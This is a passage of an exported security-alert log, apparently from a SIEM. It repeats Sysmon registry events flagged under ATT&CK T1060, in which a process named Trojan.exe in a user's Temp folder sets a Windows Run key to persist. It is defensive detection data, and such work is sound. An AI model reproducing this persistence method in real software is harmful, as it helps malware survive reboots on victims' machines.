..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:21.780218400Z"",""eventRecordID"":""1826"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:21.777\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:21.777"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:24.252",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:20.762 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:20.765650700Z"",""eventRecordID"":""1825"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:20.762\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:20.762"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:23.178",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:19.731 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:19.742236900Z"",""eventRecordID"":""1824"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:19.731\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:19.731"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:22.423",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:18.684 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:18.687564800Z"",""eventRecordID"":""1822"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:18.684\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:18.684"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:21.235",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:17.668 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:17.672119700Z"",""eventRecordID"":""1821"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:17.668\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:17.668"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:20.954",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:16.652 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:16.656929800Z"",""eventRecordID"":""1820"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:16.652\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:16.652"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:19.875",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:15.639 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:15.645416000Z"",""eventRecordID"":""1819"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:15.639\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:15.639"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:18.938",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:14.605 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:14.608378200Z"",""eventRecordID"":""1818"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:14.605\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:14.605"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:17.868",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:13.574 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:13.578743400Z"",""eventRecordID"":""1817"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:13.574\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:13.574"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:16.782",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:12.559 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:12.560945500Z"",""eventRecordID"":""1816"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:12.559\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:12.559"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:15.672",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:11.543 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:11.548316700Z"",""eventRecordID"":""1815"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:11.543\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:11.543"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:14.501",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:10.527 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
